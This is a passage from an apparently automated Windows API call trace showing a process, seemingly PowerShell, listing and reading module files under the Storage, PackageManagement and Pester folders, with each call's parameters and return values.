nFileSizeHigh=0x0, nFileSizeLow=0x63de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Disk.cdxml", cAlternateFileName="")) returned 1 [0178.004] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1672, dwReserved0=0x0, dwReserved1=0x0, cFileName="DiskImage.cdxml", cAlternateFileName="")) returned 1 [0178.004] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd78, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileIntegrity.cdxml", cAlternateFileName="")) returned 1 [0178.005] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21df, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileServer.cdxml", cAlternateFileName="")) returned 1 [0178.005] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileShare.cdxml", cAlternateFileName="")) returned 1 [0178.006] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ed3, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileStorageTier.cdxml", cAlternateFileName="")) returned 1 [0178.006] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1988, dwReserved0=0x0, dwReserved1=0x0, cFileName="InitiatorId.cdxml", cAlternateFileName="")) returned 1 [0178.006] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d28, dwReserved0=0x0, dwReserved1=0x0, cFileName="InitiatorPort.cdxml", cAlternateFileName="")) returned 1 [0178.006] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5af4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MaskingSet.cdxml", cAlternateFileName="")) returned 1 [0178.007] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="OffloadDataTransferSetting.cdxml", cAlternateFileName="")) returned 1 [0178.007] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Partition.cdxml", cAlternateFileName="")) returned 1 [0178.007] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x523b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhysicalDisk.cdxml", cAlternateFileName="")) returned 1 [0178.008] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="ResiliencySetting.cdxml", cAlternateFileName="")) returned 1 [0178.008] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xfb55, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage.format.ps1xml", cAlternateFileName="")) returned 1 [0178.008] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1937, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage.psd1", cAlternateFileName="")) returned 1 [0178.009] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b0d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage.types.ps1xml", cAlternateFileName="")) returned 1 [0178.009] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2591b, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageCmdlets.cdxml", cAlternateFileName="")) returned 1 [0178.009] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageEnclosure.cdxml", cAlternateFileName="")) returned 1 [0178.010] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageHealth.cdxml", cAlternateFileName="")) returned 1 [0178.010] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x204c, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageJob.cdxml", cAlternateFileName="")) returned 1 [0178.010] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x18e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageNode.cdxml", cAlternateFileName="")) returned 1 [0178.010] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x800a, dwReserved0=0x0, dwReserved1=0x0, cFileName="StoragePool.cdxml", cAlternateFileName="")) returned 1 [0178.011] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageProvider.cdxml", cAlternateFileName="")) returned 1 [0178.011] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x331, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageReliabilityCounter.cdxml", cAlternateFileName="")) returned 1 [0178.012] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7853, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageScripts.psm1", cAlternateFileName="")) returned 1 [0178.012] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageSetting.cdxml", cAlternateFileName="")) returned 1 [0178.012] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb35b, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageSubSystem.cdxml", cAlternateFileName="")) returned 1 [0178.013] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x223b, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageTier.cdxml", cAlternateFileName="")) returned 1 [0178.013] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="TargetPort.cdxml", cAlternateFileName="")) returned 1 [0178.013] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc46, dwReserved0=0x0, dwReserved1=0x0, cFileName="TargetPortal.cdxml", cAlternateFileName="")) returned 1 [0178.014] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x870c, dwReserved0=0x0, dwReserved1=0x0, cFileName="VirtualDisk.cdxml", cAlternateFileName="")) returned 1 [0178.096] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x1b7dde70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0178.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de350) returned 1 [0178.096] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x564 [0178.096] GetFileType (hFile=0x564) returned 0x1 [0178.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de2c0) returned 1 [0178.096] GetFileType (hFile=0x564) returned 0x1 [0178.096] ReadFile (in: hFile=0x564, lpBuffer=0x2195bd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x2195bd8*, lpNumberOfBytesRead=0x1b7de428*=0x5f8, lpOverlapped=0x0) returned 1 [0178.098] ReadFile (in: hFile=0x564, lpBuffer=0x2195110, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x2195110*, lpNumberOfBytesRead=0x1b7de428*=0x0, lpOverlapped=0x0) returned 1 [0178.098] ReadFile (in: hFile=0x564, lpBuffer=0x2195bd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x2195bd8*, lpNumberOfBytesRead=0x1b7de428*=0x0, lpOverlapped=0x0) returned 1 [0178.098] CloseHandle (hObject=0x564) returned 1 [0178.106] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0178.106] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0178.107] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0178.107] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0178.107] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0178.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0178.107] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0178.107] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32 [0178.107] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a591fb0 [0178.108] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.108] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0178.108] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0178.108] FindClose (in: hFindFile=0x1a591fb0 | out: hFindFile=0x1a591fb0) returned 1 [0178.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0178.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0178.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0178.108] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0178.108] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32 [0178.108] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5928b0 [0178.136] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.137] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0178.137] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 0 [0178.137] FindClose (in: hFindFile=0x1a5928b0 | out: hFindFile=0x1a5928b0) returned 1 [0178.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0178.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0178.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de380) returned 1 [0178.137] GetFullPathNameW (in: 